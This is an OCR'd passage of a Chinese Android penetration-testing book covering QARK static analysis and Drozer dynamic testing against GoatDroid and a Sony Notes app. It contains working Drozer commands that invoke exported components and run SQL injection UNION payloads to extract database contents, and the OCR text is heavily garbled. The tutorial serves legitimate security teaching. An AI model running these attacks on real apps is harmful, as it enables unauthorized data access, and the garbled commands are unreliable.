<uses-permission android:name="android.permission.GET_ACCOUNTS"> 
</uses—permission> 

<uses—permission android:name="android.permission.AUTHENTICATE_ACCOUNTS"> 
</uses—permission> 

<uses-permission android:name="android.permission.MANAGE_ACCOUNTS"> 
</uses-permission> 

<uses-permission android: name="android. permission. INTERNET"> 
</uses—permission> 

<uses-permission android:name="android. permission.WRITE_EXTERNAL_STORAGE"> 
</uses—permission> 

<uses—permission android:name="android.permission.RECORD_AUDIO"> 
</uses—permission> 

<uses—permission android:name="android.permission.WAKE_LOCK"> 
</uses-permission> 

<uses-permission android: name="android.permission.READ_SYNC_SETTINGS"> 
</uses—permission> 

<uses—permission android:name="android.permission.WRITE_SYNC_SETTINGS"> 
</uses—permission> 


下 图 显示 了 QARK 静 态 分 析 的 完成 进度 。 














Press ENTER key to begin Static Code Analysis 


Crypto issues 6%|### | 
Broadcast issues 6%|### | 
Webview checks — 89% [APA AEA IEH ETETETT TEHETE TETE TETE TETE TETE TEHETE EEE ETE ETETE TE ETE DEE PE EE | 
X.509 Validation 6%|### | 
Pending Intents 6%|### | 
File Permissions (check 1) 100% | 4ARKAARANRN ETE | 


File Permissions (check 2) 3% | # | 











QARK 完 成 分 析 后 , 它 会 在 QARK 目 录 下 的 output 文 件 夹 中 生成 一 份 报告 .如 果 有 需要 ,QARK 
可 以 帮助 你 创建 一 个 POC 应 用 ， 用 于 演示 如 何 利用 报告 中 的 漏洞 。 
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Information 


STATIC CODE ANALYSIS RESULT 





Manifest 
SOURCE: /Users/srini0x00/Downloads/qark-master/sonynotes.apk 


TOTAL FILES: 912 
App Components JAVA FILES: 217 

Restored 11 file(s) out of 12 corrupt file(s) 
Web Views 


X.509 Issues 
Potential Vulnerabilities EG a Informational Debug 
File Permissions 
Crypto bugs 
QARK Version 0.9 


Pending Intents 


ADB Commands 











点 击 页 面 左 侧 的 标签 ， 可 以 查看 各 项 漏洞 的 详细 信息 。 
如 上 文 所 述 ，QARK 还 能 以 无 颖 模式 运行 ， 这 种 模式 无 需 用 户 干预 。 


python gark.py --source 1 --pathtoapk ../testapp.apk --exploit 0 
--install 0 


述 命令 的 作用 与 交互 模式 的 作用 相同 。 
下 面 来 解释 这 条 命令 。 


口 --source 1: 表示 把 APK 文 件 作为 输入 ; 

口 --pathtoapk: 用 于 指定 APK 文 件 ; 

口 --exploit 0: 告知 QARK 无 需 生 成 POC APK 文 件 ; 

口 --install 0: 告知 QARK 不 要 在 设备 上 安装 POC 文 件 。 





7.3 ”小结 


本 章 讨论 了 很 多 可 能 针对 安 卓 应 用 客户 端的 攻击 ， 并 介绍 了 如 何 从 AndroidManifestxml 文 
件 、 源 代码 分 析 和 QARK 工 具 中 获取 有 价值 的 信息 。 利 用 备份 技术 ,我 们 只 需 额 外 几 步 就 可 以 在 
已 ROOT 的 设备 上 使 用 相同 的 技术 ,即使 是 未 ROOT 的 设备 。 如 果 开 发 人 员 使 用 了 这 些 应 用 组 件 ， 
那么 在 将 应 用 发 布 到 生产 环境 时 需要 额外 注意 。 建 议 读者 对 AndroidManifest.xml 文 件 进行 交叉 检 
查 ， 确 保 组 件 不 会 因为 失误 而 被 导出 。 
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在 上 一 章 中 , 我 们 从 静态 分 析 的 角度 讨论 了 针对 安 卓 应 用 常见 的 客户 端 攻 击 。 本 章 将 从 动态 
应 用 安全 测试 的 角度 讨论 相同 的 客户 端 攻 击 , 同时 还 会 介绍 一 些 自 动 化 工具 。 在 上 一 章 我 们 提 到 
过 , 要 想 成 功 实施 本 童 涉及 的 攻击 , 攻击 者 需要 首先 说 服 受害 者 在 其 手机 中 安装 恶意 应 用 。 此 外 ， 
如 果 攻 击 者 拥有 手机 的 物理 访问 权限 ， 也 可 能 成 功利 用 手机 中 的 应 用 。 


下 面 是 本 章 将 要 讨论 的 部 分 主要 内 容 。 


O 攻击 可 调试 的 应 用 

O 使 用 Xposed 框 架 进行 hook 

口 使 用 Frida 进 行动 态 插 棕 

O 使 用 Introspy 进 行 自动 化 评估 
口 使 用 Drozer 进 行 自动 化 评估 
口 攻击 应 用 组 件 

口 注入 攻击 

口 文件 包含 攻击 

口 基于 日 志 的 漏洞 























8.1 使 用 Drozer 进行 安 卓 应 用 自动 化 测试 


在 第 1 章 中 , 我 们 介绍 了 设置 Drozer 工 具 的 步骤 。 本 节 将 介绍 Drozer 的 一 些 有 用 功能 ,这 些 功 
能 可 以 提高 渗透 测试 流程 的 速度 。 在 时 间 有 限 的 情况 下 ,自动 化 测试 工具 总 是 很 有 帮助 的 。 在 编 
写本 书 的 时 候 ，Drozer 是 进行 安 时 应 用 渗透 测试 最 好 的 工具 之 一 。 为 了 更 好 地 了 解 这 个 工具 , 我 
们 将 再 次 讨论 相同 的 攻击 方法 ， 这 些 攻击 方法 在 第 7 章 中 已 经 讨论 过 了 。 















































注意 ,这 一 节 涉 及 的 攻击 方法 已 经 在 前 文中 详细 介绍 过 了 。 下 文 使 用 Drozer 
演示 了 相同 的 攻击 方法 , 但 不 会 深入 讨论 后 台所 发 生 的 技术 细节 。 我 们 希望 向 读 
者 展示 如 何 使 用 Drozer 工 具 进行 相同 的 攻击 。 


168 第 8 章 客户 端 攻击 一 动态 分 析 技 术 








在 讨论 这 些 攻 击 方法 之 前 ， 我 们 首先 了 解 一 下 Drozer 中 一 些 有 用 的 命令 。 


8.1.1 列 出 全 部 模块 


list 





这 个 命令 会 列 出 在 当前 会 话 下 Drozer 可 以 执行 的 所 有 模块 。 


dz> list 


app.activity.forintent 
the given intent 


app.activity.info 
activities. 


app.activity.start 


app.broadcast.info 
receivers 


app.broadcast.send 
app.package.attacksurface 


app.package.backup 


Find activities that can handle 


Gets information about exported 


Start an Activity 


Get information about broadcast 


Send broadcast using an intent 


Get attack surface of package 


Lists packages that use the 


backup API (returns true on FLAG ALLOW_BACKUP) 


app.package.debuggable 


app.package.info 
packages 


app.package. launchintent 
app.package.list 


app.package.manifest 
package 


app.package.native 
in the application. 


scanner.provider.finduris 
that can be queried from our context. 


scanner.provider.injection 
injection vulnerabilities. 


Find debuggable packages 


Get information about installed 


Get launch intent of package 


List Packages 


Get AndroidManifest.xml of 


Find Native libraries embedded 


Search for content providers 


Test content providers for SQL 
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scanner.provider.sqltables Find tables accessible through 


SQL 


injection vulnerabilities. 


scanner.provider.traversal Test content providers for basic 
directory traversal vulnerabilities. 


shell.exec Execute a single Linux command. 
shell.send Send an ASH shell to a remote 
listener. 

shell.start Enter into an interactive Linux 
shell. 

tools.file.download Download a File 
tools.file.md5sum Get md5 Checksum of file 
tools.file.size Get size of file 
tools.file.upload Upload a File 
tools.setup.busybox Install Busybox. 
tools.setup.minimalsu Prepare 'minimal-su' binary 


installation on the device. 


dz> 





述 代码 列 出 了 Drozer 可 以 执行 的 所 有 模块 。 


2 检索 包 信 息 oS 

















如 果 想 要 列 出 安装 到 模拟 器 或 设备 上 的 所 有 软件 包 ， 可 以 运行 下 面 的 命令 。 


run 
Vo a 
IZÍTIX 


dz> 


app.package.list 
文 个 命令 会 列 出 已 安装 的 所 有 软件 包 ， 如 下 所 示 。 


run app.package.list 


-android.soundrecorder (Sound Recorder) 
-android.sdksetup (com.android.sdksetup) 
-androidpentesting.hackingandroidvulnapp1 (HackingAndroidVulnApp1) 
-android.launcher (Launcher) 

-android.defcontainer (Package Access Helper) 
-android.smoketest (com.android.smoketest ) 
-android.quicksearchbox (Search) 

-android.contacts (Contacts) 
-android.inputmethod.latin (Android Keyboard (AOSP) ) 
-android.phone (Phone) 

-android.calculator2 (Calculator) 
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8.1 


com.adobe.reader (Adobe Reader) 
com.android.emulator.connectivity.test (Connectivity Test) 
com.androidpentesting.couch (Couch) 
com.android.providers.calendar (Calendar Storage) 
com.example.srini0x00.music (Music) 

com.androidpentesting.pwndroid (PwnDroid) 


com.android. 
com.android. 
com.android. 
com.android. 
com.android. 
com.android. 


inputdevices (Input Devices) 
customlocale2 (Custom Locale) 
calendar (Calendar) 

browser (Browser) 

music (Music) 
providers.downloads (Download Manager) 


3 查找 目标 应 用 的 包 名 


如 果 需 要 查找 设备 上 某 一 应 用 的 包 名 ， 可 以 通过 
我 们 查找 索尼 的 记事 本 应 用 ， 如 下 所 示 。 


dz> run app.package.list --filter [要 查找 的 字符 串 ] 


运行 上 面 的 





命令 会 


显示 匹配 的 应 用 ， 如 下 所 示 。 


dz> run app.package.list --filter notes 
com.sonyericsson.notes (Notes) 


dz> 

















--filterj 


将 --filter 蔡 换 成 -f 也 可 以 达到 相同 的 效果 ， 如 下 所 示 。 


dz> run app.package.list -f notes 
com.sonyericsson.notes (Notes) 


dz> 


4 获取 包 信息 





使 用 下 面 的 Drozer 命 令 ， 可 以 获取 目标 应 用 的 包 信 息 。 





dz> run app.package.info -a [ 包 名 ] 
命令 会 显示 应 用 的 相关 信息 ， 如 下 所 示 。 


dz> run app.package.info -a com.sonyericsson.notes 


运行 这 


Package : 





com.sonyericsson.notes 


Application Label: Notes 


Process Name: 
Version: 
Data Directory: 
APK Path: 


UID: 
GID: 


10072 
[3003, 


1.C.6 


1028, 


com.sonyericsson.notes 


1015] 


/data/data/com.sonyericsson.notes 
/data/app/com.sonyericsson.notes-1.apk 





选项 搜索 特定 的 关键 词 。 在 本 例 
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Shared Libraries: null 

Shared User ID: null 

Uses Permissions: 

- android.permission.GET_ACCOUNTS 

- android.permission.AUTHENTICATE_ ACCOUNTS 
- android.permission.MANAGE_ ACCOUNTS 

- android.permission. INTERNET 

- android.permission.WRITE_EXTERNAL_STORAGE 
- android.permission.RECORD_AUDIO 

- android.permission.WAKE_LOCK 

- android.permission.READ_SYNC_SETTINGS 

- android.permission.WRITE_SYNC_SETTINGS 

- android.permission.READ_EXTERNAL_STORAGE 
Defines Permissions: 

- None 


dz> 


从 上 面 的 代码 中 可 以 看 到 ， 这 个 命令 显示 很 多 的 应 用 细节 , 包括 包 名 、 应 用 版 本 号 、 设 备 上 
应 用 数据 目录 、APK 路 径 以 及 应 用 权限 。 


8.1.5 464% AndroidManifes.xml 文件 


我 们 经 常会 遇 到 需要 AndroidManifes.xml 文 件 来 了 解 应 用 详细 信息 的 情况 。 虽 然 可 以 通过 
Drozer 使 用 不 同 的 选项 来 找 出 AndroidManifes.xml 中 我 们 需要 的 所 有 信息 ， 但 是 能 够 获取 
AndroidManifes.xml 文 件 也 是 不 错 的 。 下 面 的 命令 可 以 转 储 目标 应 用 的 完整 Android Manifes.xml 
文件 。 

dz> run app.package.manifest [ 包 名 ] 


运行 这 个 命令 会 显示 下 面 的 输出 〈 输 出 有 删 减 )。 








dz> run app.package.manifest com.sonyericsson.notes 
<manifest versionCode="1" 
versionName="1.C.6" 
package="com.sonyericsson.notes"> 
<uses-sdk minSdkVersion="14" 
targetSdkVersion="15"> 
</uses-sdk> 
<uses-permission name="android.permission.GET_ACCOUNTS"> 
</uses-permission> 
<uses-permission name="android.permission.AUTHENTICATE_ ACCOUNTS" > 
</uses-permission> 
<uses-permission name="android.permission.MANAGE ACCOUNTS"> 
</uses-permission> 
<uses-permission name="android.permission. INTERNET" > 
</uses-permission> 
<uses-permission name="android.permission.WRITE_EXTERNAL_STORAGE"> 
</uses-permission> 





172 第 8 章 客户 端 攻 击 一 一 动态 分 析 技 术 





" 


<uses-permission name="android.permission.RECORD_AUDIO"> 


</uses-permission> 


<uses-permission name="android.permission.WAKE_LOCK"> 


</uses-permission> 


<uses-permission name="android.permission.READ_SYNC_SE 


</uses-permission> 


<uses-permission name="android.permission.WRITE_SYNC_S 


</uses-permission> 


<application theme="@2131427330" 
labe1="@2131296263" 
icon="@2130837504"> 

<provider name=".NoteProvider" 


authorities="com.sonyericsson.notes.provid 


</provider> 


<receiver name=".NotesReceiver"> 
<intent-filter> 


TTINGS"> 


ETTINGS"> 


er.Note"> 


<action name="com.sonyericsson.vendor.backuprestore.intent. 


ACTION_RESTORE_APP_COMPLETE"> 
</action> 
</intent-filter> 
</receiver> 
</application> 
</manifest> 


dz> 


8.16 ”查找 攻击 面 


使 用 下 面 的 命令 可 以 查找 应 用 的 攻击 面 。 基 本 上 ， 这 个 命令 能 








dz> run app.package.attacksurface [ 包 名 ] 





运行 这 个 命令 会 列 出 所 有 导出 的 组 件 ， 


如 下 所 示 。 


dz> run app.package.attacksurface com.sonyericsson.notes 


Attack Surface: 
4 activities exported 
2 broadcast receivers exported 
1 content providers exported 
2 services exported 


到 目前 为 止 ， 我 们 讨论 了 Drozer 的 基本 命令 ， 可 能 
面 介绍 如 何 使 用 Drozer 攻 击 应 用 。 如 上 文 所 述 ， 我 们 会 使 用 相同 的 目标 应 用 和 攻击 方法 ， 


但 使 用 Drozer 执 行 攻击 。 


够 列 出 所 有 导出 的 应 月 


HAE. 





会 在 测试 中 使 用 这 些 命令 。 
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8.1.7 ”针对 activity 的 攻击 
首先 ， 我 们 需要 识别 GoatDroid 应 用 的 攻击 面 。 


dz> run app.package.attacksurface org.owasp.goatdroid.fourgoats 
Attack Surface: 

4 activities exported 

1 broadcast receivers exported 

0 content providers exported 

1 services exported 

is debuggable 

dz> 


上 面 的 输出 显示 有 四 个 导出 的 activity。 使 用 下 面 的 命令 查看 应 用 中 所 有 导出 的 activity。 
dz> run app.activity.info -a [ 包 名 ] 


运行 上 面 的 命令 ， 会 显示 如 下 输出 。 











dz> run app.activity.info -a org.owasp.goatdroid.fourgoats 

Package: org.owasp.goatdroid.fourgoats 
org.owasp.goatdroid.fourgoats.activities.Main 
org.owasp.goatdroid.fourgoats.activities.ViewCheckin 
org.owasp.goatdroid.fourgoats.activities.ViewProfile 
org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication 


dz> 


可 以 看 到 ， 我 们 获得 了 所 有 导出 的 activity。 下 面 这 个 activity 是 我 们 之 前 使 用 adb 测 试 过 的 。 





org.owasp.goatdroid.fourgoats.activities.ViewProfile 


如 果 想 要 找 出 包括 未 导出 的 activity 在 内 的 所 有 activity， 可 以 在 前 面 的 命令 后 面 加 上 -u 字 符 ， 
如 下 所 示 。 





dz> run app.activity.info -a org.owasp.goatdroid.fourgoats -u 
Package: org.owasp.goatdroid.fourgoats 
Exported Activities: 
org.owasp.goatdroid.fourgoats.activities.Main 
org.owasp.goatdroid.fourgoats.activities.ViewCheckin 
org.owasp.goatdroid.fourgoats.activities.ViewProfile 
org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication 
Hidden Activities: 
org.owasp.goatdroid.fourgoats.activities.Login 
org.owasp.goatdroid.fourgoats.activities.Register 
org.owasp.goatdroid.fourgoats.activities.Home 
org.owasp.goatdroid.fourgoats.fragments.DoCheckin 
org.owasp.goatdroid.fourgoats.activities.Checkins 
org.owasp.goatdroid.fourgoats.activities.Friends 
org.owasp.goatdroid.fourgoats.fragments.HistoryFragment 
org.owasp.goatdroid.fourgoats.activities.History 
org.owasp.goatdroid.fourgoats.activities.Rewards 
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~ 





org.owasp.goatdroid.fourgoats.activities.AddVenue 
org.owasp.goatdroid.fourgoats. fragments .MyFriends 
org.owasp.goatdroid.fourgoats.fragments.SearchForFriends 
org.owasp.goatdroid.fourgoats.fragments.PendingFriendRequests 
org.owasp.goatdroid.fourgoats.activities.ViewFriendRequest 
org.owasp.goatdroid.fourgoats.fragments.MyRewards 
org.owasp.goatdroid.fourgoats.fragments.AvailableRewards 
org.owasp.goatdroid.fourgoats.activities.Preferences 
org.owasp.goatdroid.fourgoats.activities.About 
org.owasp.goatdroid.fourgoats.activities.SendsMSs 
org.owasp.goatdroid.fourgoats.activities.DoComment 
org.owasp.goatdroid.fourgoats.activities.UserHistory 
org.owasp.goatdroid.fourgoats.activities.DestinationInfo 
org.owasp.goatdroid.fourgoats.activities.AdminHome 
org.owasp.goatdroid.fourgoats.activities.AdminOptions 
org.owasp.goatdroid.fourgoats. fragments .ResetUserPasswords 
org.owasp.goatdroid.fourgoats.fragments.DeleteUsers 
org.owasp.goatdroid.fourgoats.activities.DoAdminPasswordReset 
org.owasp.goatdroid.fourgoats.activities.DoAdminDeleteUser 
org.owasp.goatdroid.fourgoats.activities.GenericWebViewActivity 


dz> 


由 于 这 个 私有 的 activity 是 导出 的 , 我们 可 以 在 不 输入 有 效 登 录 信 息 的 情况 下 ， 使 月 
Eo 


下 图 是 GoatDroid 应 用 的 启动 界面 。 

















Y Login 


Username 


Password 


™ Remember Me 


Login 
Register 





运行 下 面 的 命令 ， 可 以 调用 这 个 activity。 


dz> run app.activity.start --component org.owasp.goatdroid.fourgoats org. 
owasp.goatdroid.fourgoats.activities.ViewProfile 
dz> 


月 Drozer 调 
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运行 命令 后 ， 观 


见 察 模拟 需 ， 将 会 看 到 下 面 的 activity 被 调用 了 。 





Y Profile 


Last Checkin 


Request As Friend 


View Checkin History 








8.1.8 针对 服务 的 攻击 


与 activity 类 似 ， 我 们 也 可 以 通过 Drozer 调 用 服务 。 下 面 的 命令 会 列 出 目标 应 用 所 有 导出 
的 服务 。 


























dz> run app.service.info -a [ 包 名 ] 


对 GoatDroid 应 用 运行 上 面 的 命令 ， 会 显示 如 下 信息 。 





dz> run app.service.info -a org.owasp.goatdroid.fourgoats 
Package: org.owasp.goatdroid.fourgoats 
org.owasp.goatdroid.fourgoats.services.LocationService 
Permission: null 


dz> 


从 上 面 的 代码 中 可 以 看 到 ， 我 们 获得 了 应 用 中 导出 的 服务 。 
与 activity 类 似 ， 我 们 也 可 以 使 用 -u 字 符 列 出 所 有 的 服务 。 





dz> run app.service.info -a org.owasp.goatdroid.fourgoats -u 
Package: org.owasp.goatdroid.fourgoats 
Exported Services: 
org.owasp.goatdroid.fourgoats.services.LocationService 
Permission: null 
Hidden Services: 


dz> 
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从 上 面 的 代码 中 可 以 看 到 ， 该 应 用 所 有 的 服务 都 是 导出 的 。 
接 下 来 ， 使 用 下 面 的 命令 调用 服务 。 


dz> run app.service.start --component org.owasp.goatdroid.fourgoats org. 
owasp.goatdroid.fourgoats.services.LocationService 





8.1.9 ”广播 接收 器 


与 activity 和 服务 类 似 ， 我 们 还 可 以 使 用 Drozer 调 用 广播 接收 器 。 下 面 的 命令 会 列 出 目标 应 用 
中 所 有 导出 的 广播 接收 需 。 


dz> run app.broadcast.info -a [ 包 名 ] 


对 GoatDroid 应 用 运行 上 面 的 命令 ， 会 显示 如 下 内 容 。 


dz> run app.broadcast.info -a org.owasp.goatdroid.fourgoats 
Package: org.owasp.goatdroid.fourgoats 

Receiver: org.owasp.goatdroid.fourgoats.broadcastreceivers. 
SendSMSNowReceiver 


dz> 


从 上 面 的 代码 中 可 以 看 出 ， 这 个 应 用 有 一 个 导出 的 广播 接收 需 。 
我 们 也 可 以 使 用 -u 字 符 来 列 出 未 导出 的 广播 接收 器 ， 如 下 所 示 。 


dz> run app.broadcast.info -a org.owasp.goatdroid.fourgoats -u 
Package: org.owasp.goatdroid.fourgoats 
Exported Receivers: 
Receiver: org.owasp.goatdroid.fourgoats.broadcastreceivers. 
SendSMSNowReceiver 
Hidden Receivers: 











于 














dz> 


从 上 面 的 代码 中 可 以 看 出 ， 这 个 应 用 所 有 的 广播 接收 器 都 是 导出 的 。 
接 下 来 ,使 用 下 面 的 Drozer 命 令 来 调用 一 个 广播 intent。 





dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats. 
SOCIAL SMS --component org.owasp.goatdroid.fourgoats org.owasp. 
goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string 
phoneNumber 5556 --extra string message CRACKED 


上 述 命令 会 触发 广播 接收 器 ， 这 和 我 们 前 面 使 用 adp 命 令 的 效果 类 似 ， 如 下 图 所 示 。 
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Your text message has been sent! 


d A = 
ef . = 
> e . > 





8.1.10 使 用 Drozer 引起 内 容 提 供 程序 泄漏 和 进行 SQL 注入 


本 将 介绍 如 何 利用 Drozer 攻 击 内 容 提供 程序 ,并 且 使 用 前 文中 的 索尼 记事 本 应 用 作为 攻击 
目标 。 


使 用 下 面 的 命令 可 以 查找 目标 应 用 的 包 名 。 








dz> run app.package.list -f notes 
com.sonyericsson.notes (Notes) 
dz> 


我 们 知道 该 应 用 有 一 个 导出 的 内 容 提 供 程序 ， 这 里 我 们 使 用 Drozer 来 查找 它 。 下 面 的 命令 可 
以 列 出 导出 的 组 件 。 





dz> run app.package.attacksurface com.sonyericsson.notes 
Attack Surface: 

4 activities exported 

2 broadcast receivers exported 

1 content providers exported 

2 services exported 
dz> 





到 这 一 步 ,我们 使 用 grep 命 令 来 查找 内 容 提 供 程 序 的 URI， 之 前 我 们 曾 使 用 agb 找 到 了 这 个 
URI。Drozer 可 以 自动 查找 内 容 提 供 程 序 的 URI， 将 这 个 过 程 变 得 更 加 简单 。 使 用 下 面 的 命令 就 
可 以 找到 内 容 提供 程序 的 URI。 





dz> run scanner.provider.finduris -a [&%] 


dz> run scanner.provider.finduris -a com.sonyericsson.notes 
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Scanning com.sonyericsson.notes... 


Able to Query content://com.sonyericsson.notes.provider.Note/accounts/ 
Able to Query content://com.sonyericsson.notes.provider.Note/accounts 
Unable to Query content://com.sonyericsson.notes.provider.Note 

Able to Query content://com.sonyericsson.notes.provider.Note/notes 
Able to Query content://com.sonyericsson.notes.provider.Note/notes/ 


Unable to Query content://com.sonyericsson.notes.provider.Note/ 


Accessible content URIs: 
content://com.sonyericsson.notes.provider.Note/notes/ 
content://com.sonyericsson.notes.provider.Note/accounts/ 
content://com.sonyericsson.notes.provider.Note/accounts 
content://com.sonyericsson.notes.provider.Note/notes 

dz> 


从 上 面 的 代码 中 可 以 看 出 ， 我 们 得 到 了 四 个 可 以 访问 的 内 容 提供 程序 的 URI。 
可 以 通过 app.provider.query 模 块 查询 这 些 内 容 提 供 程序 ， 如 下 所 示 。 
dz> run app.provider.query [内 容 提供 程序 的 URI] 


运行 上 而 的 命令 ,会 显示 如 下 输出 。 




















dz> run app.provider.query content://com.sonyericsson.notes.provider. 
Note/notes/ 


| isdirty | body | account_id | voice_path | doodle_path | deleted 
| modified | sync_uid | title | meta_info | _id | created 
background | usn | 
| 1 | test note_1 | 1 | | | 0 
| 1448466224766 | null | No title | 

false 

ol21 | 1448466224766 | com.sonyericsson.notes:drawable/notes_ 
background_grid_view_1 | 0 | 

| 1 | test note 2 | 1 | | | 0 
| 1448466232545 | null | No title | 

false 

0 | 2 | 1448466232545 | com.sonyericsson.notes:drawable/notes_ 


background grid view 1 10 | 

dz> 

从 上 面 的 输出 中 可 以 看 出 ， 我 们 可 以 从 应 用 的 提供 程序 中 查询 内 容 ， 不 会 报 任何 错 。 
另外 ,我 们 也 可 以 使 用 下 面 的 命令 以 垂直 的 形式 显示 结 


dz> run app.provider.query [URI] --vertical 


运行 上 面 的 命令 ， 会 以 美观 的 形式 来 显示 结果 ， 如 下 所 示 。 




















dz> run app.provider.query content://com.sonyericsson.notes.provider. 
Note/notes/ --vertical 
isdirty 1 
body test note_1 
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account_id 1 
voice_path 
doodle_path 
deleted 0 
modified 1448466224766 
sync_uid null 
title No title 
meta_info 
false 
0 
_ id 1 
created 1448466224766 
background com.sonyericsson.notes:drawable/notes_background_grid_view_1 
usn 0 
isdirty 1 
body test note_2 
account_id 1 
voice_path 
doodle_path 
deleted 0 
modified 1448466232545 
sync_uid null 
title No title 
meta_info 
false 
0 
_id 2 
created 1448466232545 
background com.sonyericsson.notes:drawable/notes_background_grid_view_1 
usn 0 
dz> 


8.1.11 


使 用 Drozer 进行 SQL 注入 攻击 


下 面 介绍 如 何 查找 内 容 提 供 程序 URI 中 的 SQL 注入 漏洞 。 


我 们 使 用 scanner.provider.injection 模 块 。 


dz> run scanner.provider.injection -a 








[ 包 名 ] 











扫描 器 是 Drozer 中 很 好 用 的 工具 之 一 ， 它 能 自动 查找 注入 漏洞 和 目录 遍历 漏洞 。 我 们 会 在 本 
部 分 的 后 面 讨论 目录 遍 历 攻 击 。 


运行 下 面 的 命令 ， 会 告知 我 们 内 容 提供 程序 是 否 有 注 人 漏洞 




















dz> run scanner.provider.injection -a com.sonyericsson.notes 
Scanning com.sonyericsson.notes... 
Not Vulnerable: 
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content://com.sonyericsson.notes.provider.Note 
content://com.sonyericsson.notes.provider.Note/ 


Injection in Projection: 
No vulnerabilities found. 


Injection in Selection: 
content://com.sonyericsson.notes.provider.Note/notes/ 
content: //com.sonyericsson.notes.provider.Note/accounts/ 
content://com.sonyericsson.notes.provider.Note/accounts 
content://com.sonyericsson.notes.provider.Note/notes 

dz> 


从 上 面 的 代码 中 可 以 看 出 ， 这 四 个 URI 都 有 注入 漏洞 。 


之 前 讨论 过 ,传统 确认 SQL 注 和 人 的 方法 是 ,传人 一 个 单 引 号 来 中 断 查 询 操作 。 我 们 尝试 传人 
个 单 引号 ， 看 看 会 有 什么 反应 。 


按照 下 面 的 命令 进行 操作 。 


























dz> run app.provider.query content://com.sonyericsson.notes.provider. 
Note/notes/ --selection "'" 


unrecognized token: "')" (code 1): , while compiling: SELECT isdirty, 
body, account_id, voice_path, doodle path, deleted, modified, sync_uid, 
title, meta_info, _id, created, background, usn FROM notes WHERE (') 
dz> 


观察 上 面 的 输出 可 以 发 现 ， 查 询 操作 中 传人 了 单 引 号 ， 抛 出 了 一 个 错误 ， 查 询 中 止 。 
接 下 来 ， 我 们 构建 一 个 正常 的 查询 操作 ， 传 人 ida=1。 





dz> run app.provider.query content://com.sonyericsson.notes.provider. 
Note/notes/ --selection "_id=1" 


| isdirty | body | account_id | voice_path | doodle path | deleted 
| modified | sync_uid | title | meta_info | _id | created 
background | usn | 

| 1 | test note 1 | 1 | | | 0 

| 1448466224766 | null | No title | 

false 

O Z | 1448466224766 | com.sonyericsson.notes:drawable/notes_ 
background_grid_view_1 | 0 | 

dz> 


不 出 所 料 ， 执 行 上 面 的 查询 操作 后 ， 返 回 了 id 为 1 的 那 一 行 。 按 照 之 前 adqb 中 使 用 的 方法 ， 
我 们 来 编写 一 条 包含 UNION 操 作 符 的 select 语 句 。 




















dz> run app.provider.query content://com.sonyericsson.notes.provider. 
Note/notes/ --selection "_id=1=1)union select 1,2,3,4,5,6,7,8,9,10,11,12, 
13,14 from sqlite_master where (1=1" 


| isdirty | body | account_id | voice_path | doodle path | deleted 
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我 们 


| modified | sync_uid | title | meta_info | _id | created 
background | usn | 
1 1 1 2 | 3 | 4 | 5 | 6 
| 7 | 8 | 9 | 10 | 11 | 12 

13 | 14 1 
| 1 | test note_1 | 1 | | | 0 
| 1448466224766 | null | No title | 

false 

0 I1 | 1448466224766 | com.sonyericsson.notes:drawable/notes_ 


background_grid_view_1 | 0 | 

dz> 

从 上 面 的 输出 中 可 以 看 到 从 1 到 14 这 些 数字 。 现在 可 以 通过 替换 任意 数字 来 提取 数据 库 内 容 。 
把 列 号 5 替换 成 salite_version () 就 会 打印 数据 库 版 本 号 ， 如 下 所 示 。 

dz> run app.provider.query content://com.sonyericsson.notes.provider. 


Note/notes/ --selection "_id=1=1)union select 1,2,3,4,sqlite_ 
version(),6,7,8,9,10,11,12,13,14 from sqlite_master where (1=1" 

















| isdirty | body | account_id | voice_path | doodle_path | deleted 
| modified | sync_uid | title | meta_info | _id | created 
background | usn | 

| 工 | 2 | 3 | 4 | 3.7.11 | 6 

| 7 | 8 | 9 | 10 | 11 | 12 

13 | 14 

I1 | test note_1 | 1 | | | 0 

| 1448466224766 | null | No title | 

false 

o Jil | 1448466224766 | com.sonyericsson.notes:drawable/notes_ 


background_grid_view_1 | 0 l 


dz> 


要 想 使 用 Drozer 获 取 表 名 ， 只 需要 简单 地 将 列 号 5 替换 成 tbl_name。 命令 如 下 所 示 。 注 意 ， 
是 通过 查询 sql ite_master 来 获得 表 名 的 。 





dz> run app.provider.query content://com.sonyericsson.notes. 
provider.Note/notes/ --selection "_id=1=1)union select 1,2,3,4,tbl_ 
name,6,7,8,9,10,11,12,13,14 from sqlite_master where (1=1" 


| isdirty | body | account_id | voice_path | doodle_path 

deleted | modified | sync_uid | title | meta_info | _id | created 
| background | usn | 

| 法 | 2 | 3 | 4 | accounts | 6 
| 7 | 8 | 9 | 10 | 11 | 12 | 
13 | 14 | 

| 工 | 2 | 3 14 | android_metadata | 6 
17 | 8 | 9 | 10 | 11 | 12 

13 | 14 | 

| 工 | 2 | 3 | 4 | notes | 6 


| 7 | 8 | 9 | 10 | 11 | 12 
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13 | 14 | 

| 1 | test note 1 | 1 | | 0 
| 1448466224766 | null | No title | 

false 

o | 21 | 1448466224766 | com.sonyericsson.notes:drawable/notes_ 


background_grid_view_1 | 0 | 
dz> 


从 上 面 的 输出 中 可 以 看 出 ,我 们 提取 出 了 下 面 的 表 。 


QO) accounts 


口 android_metadata 





ü notes 


8.1.12 内容 提供 程序 目录 遍历 攻击 


内 容 提供 程序 还 能 被 当 作文 件 备份 提供 程序 。 这 意味 着 开发 人 员 可 以 编写 一 个 内 容 提 供 程 
序 ， 并 人 允许 其 他 应 用 访问 它 的 私有 文件 。 当 应 用 通过 内 容 提供 程序 访问 这 些 文件 时 ， 如 果 所 读 取 
的 文件 没有 经 过 合适 的 验证 , 那么 它 可 能 读 取 有 漏洞 的 应 用 中 的 任意 文件 。 通常 可 以 通过 遍历 所 
有 目录 来 达到 这 一 效果 。 




















修改 contentProvider 类 中 的 public ParcelFileDescriptor openFile(Uri uri, 
String mode) ， 可 以 实现 基于 文件 的 内 容 提 供 程序 。 








下 面 的 链接 介绍 了 如 何在 应 用 上 实现 这 一 功能 : http://blog.evizija.si/android-contentprovider/。 
Drozer 的 scanner.provider.traversal 模 块 可 以 扫描 内 容 提供 程序 ， 并 查找 遍历 漏洞 。 


本 节 将 介绍 如 何 使 用 Drozer 查 找 并 利用 安 卓 应 用 中 的 目录 遍历 漏洞 ， 我 们 使 用 安 卓 版 的 
Adobe Reader 应 用 。 


关于 该 应 用 的 原始 咨询 信息 参见 下 面 的 链接 : http://blog.seguesec.com/2012/09/path-traversal- 
